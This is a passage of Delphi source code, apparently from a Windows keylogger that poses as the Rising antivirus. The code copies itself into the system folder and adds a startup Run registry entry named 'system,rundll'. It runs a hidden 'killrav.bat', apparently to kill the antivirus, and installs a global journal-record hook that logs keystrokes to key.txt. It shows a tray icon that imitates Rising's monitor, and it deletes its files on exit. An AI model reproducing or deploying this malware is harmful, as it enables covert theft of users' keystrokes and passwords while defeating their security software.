copyfile(pchar(application.exename), pchar(sysdir + myname), false);
end;
with tregistry.create do
begin
rootkey := hkey_local_machine;
openkey('\software\microsoft\windows\currentversion\run', true );
writestring( 'system,rundll', sysdir+'ravmom.exe' );
free;
end;
assignfile(creeper,sysdir+'key.txt');
if not fileexists(sysdir+'key.txt') then
begin
rewrite(creeper);
closefile(creeper);
end;
assignfile(creeper1,sysdir+'name.txt');
if not fileexists(sysdir+'name.txt') then
begin
rewrite(creeper1);
closefile(creeper1);
end;
winexec(pchar(sysdir+'killrav.bat'),sw_hide);
hhook := 0;
hhook := setwindowshookex(wh_journalrecord, hookproc, hinstance, 0);
noti:=new(pnotifyicondata);
noti.cbsize:=80;
noti.wnd:=form1.handle;
noti.uid:=0;
noti.sztip:='瑞星计算机监控';
noti.hicon:=form1.icon.handle;//瑞星图标
noti.uflags:=nif_message or nif_icon or nif_tip;
shell_notifyicon(nim_add,noti);
end;
procedure tform1.timer1timer(sender: tobject);
begin
enumwindows(@fpopoid,0);
end;
procedure tform1.formdestroy(sender: tobject);
begin
deletefile(getwindir+'key.txt');
deletefile(getwindir+'name.txt');
deletefile(getwindir+'killrav.bat');
end;
end.
